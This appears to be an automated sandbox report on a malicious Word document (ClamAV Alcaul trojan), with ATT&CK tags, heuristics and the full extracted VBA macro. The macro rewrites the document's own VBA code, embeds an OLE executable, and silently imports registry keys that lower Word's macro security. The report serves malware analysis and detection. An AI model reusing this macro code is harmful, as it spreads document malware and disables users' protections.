Verdict: MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1204.002 Malicious File
- T1137.001 DLL Search Order Hijacking
The VBA macro executes a Document_Open subroutine which writes a script to 'c:\xploit.txt', then attempts to insert this script into the current document's VBA project. It also adds an OLE object 'c:\click2X.com' and modifies registry keys to lower Word's macro security settings, enabling further execution. Finally, it executes 'regedit /s c:\vv.reg' to apply these changes.
Heuristics (5)
- ClamAV: Doc.Trojan.Alcaul-21 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Alcaul-21
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1499 bytes |

SHA-256: ee19a7af7ecdf5dfea3438fc2f445aea5a43dadce15d2463fad091f456b2ec14
Detection (ClamAV): Win.Trojan.Alcaul-20
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub document_close()
On Error Resume Next
Open "c:\xploit.txt" For Output As 2
Print #2, "sub document_open()"
Print #2, "On Error Resume Next"
Print #2, "'by alcopaul"
Print #2, "obj = ActiveDocument.Shapes(1).OLEFormat.ClassType"
Print #2, "With ActiveDocument.Shapes(1).OLEFormat"
Print #2, " .ActivateAs ClassType:=obj"
Print #2, " .Activate"
Print #2, "End With"
Print #2, "end sub"
Close 2
Set fso = CreateObject("Scripting.FileSystemObject")
Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\xploit.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
ActiveDocument.Shapes.AddOLEObject _
FileName:="c:\click2X.com", _
LinkToFile:=False
ActiveDocument.Save
Open "c:\vv.reg" For Output As 3
Print #3, "REGEDIT4"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, """AccessVBOM""=dword:00000001"
Close 3
Shell "regedit /s c:\vv.reg", vbHide
Kill "c:\vv.reg"
End Sub